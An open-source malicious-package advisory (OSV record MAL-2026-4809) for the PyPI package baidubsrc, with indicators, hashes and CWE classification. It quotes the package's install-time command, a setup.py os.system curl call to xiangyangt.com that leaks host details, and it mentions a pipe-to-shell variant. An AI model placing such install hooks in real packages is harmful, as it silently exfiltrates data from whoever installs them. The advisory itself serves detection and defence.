MAL-2026-4809

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/baidubsrc/MAL-2026-4809.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4809
Published
2026-05-26T13:07:47Z
Modified
2026-05-26T23:00:55.112674955Z
Summary
Malicious code in baidubsrc (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd)

setup.py executes os.system("curl xiangyangt.com/pypi") unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a personal third-party domain that is not associated with any documented publisher of this package. The request leaks the installer's IP address, User-Agent, and the fact that the package was installed on the host. The package is otherwise a trivial demo (placeholder author="demo", description "A demo pip package") with no functional need for any network activity at install time. While the response is not piped to a shell here, the install-time outbound beacon is a deliberate exfiltration of host-identifying data to an attacker-chosen endpoint, and the curl-pipe-to-shell variant is one edit away.

Source: kam193 (70342acb0742af0305c096283134cfa09133c44ff24030993e4468c96e9021cc)

During installation, the package calls home, and there is no other functionality.

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

  • The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

  • The package overrides the install command in setup.py to execute malicious code during installation.

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-05-26T13:32:46.899109904Z",
            "versions": [
                "0.0.1"
            ],
            "modified_time": "2026-05-26T13:08:42Z",
            "sha256": "601a0198fee420c15f127c695a251ac5fb2433357e0a24f146bc8c3cac8a5c77",
            "id": "IN-MAL-2026-004909",
            "source": "amazon-inspector"
        },
        {
            "import_time": "2026-05-26T13:32:46.837330409Z",
            "source": "amazon-inspector",
            "modified_time": "2026-05-26T13:07:47Z",
            "id": "IN-MAL-2026-004908",
            "sha256": "e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd",
            "versions": [
                "0.0.1"
            ]
        },
        {
            "import_time": "2026-05-26T22:55:25.019349347Z",
            "source": "kam193",
            "modified_time": "2026-05-26T22:06:08.515385Z",
            "sha256": "70342acb0742af0305c096283134cfa09133c44ff24030993e4468c96e9021cc",
            "id": "pypi/GENERIC-standard-pypi-install-pentest/baidubsrc",
            "versions": [
                "0.0.1"
            ]
        }
    ]
}
References
Credits

Affected packages

PyPI / baidubsrc

Package: baidubsrc (PyPI)

Affected ranges: 0.*

Affected versions: 0.0.1

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "baidubsrc-0.0.1-py3-none-any.whl",
            "hashes": {
                "blake2b_256": "b960331bddc93619bb76c0e44ac7c37b57845a07de824b1590ceb0758113cbb1",
                "sha256": "985ada2bb71018594b9b1b944dd6f9f326ef0914c08804d7a39abe8e7bc0a39d",
                "md5": "d87c9c373207730322ddd06b3ab633a1"
            }
        },
        {
            "filename": "baidubsrc-0.0.1.tar.gz",
            "hashes": {
                "blake2b_256": "e64910c19329175a3183b844480d2fb212ddd844be8c4940e0667d71ba8baa67",
                "sha256": "2cdd3074e5efed03318366f2567cd7a4ffc391e8ae01fa4eab4ef153ea5b7280",
                "md5": "0075be1d16a6c98c8d67bb089a687286"
            }
        }
    ],
    "domains": [
        "xiangyangt.com"
    ],
    "evidence_files": [
        {
            "path": "setup.py",
            "sha256": "72c8d64ee57380a52dbe0f588800c3a93010e96b8ca880e47be5e355def45fa9",
            "tlsh": "e1d02ea14e4222a994c0ac1a2d95380202286d633e20e1c8b3c64b242b491ebab7b679"
        }
    ]
}
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/baidubsrc/MAL-2026-4809.json"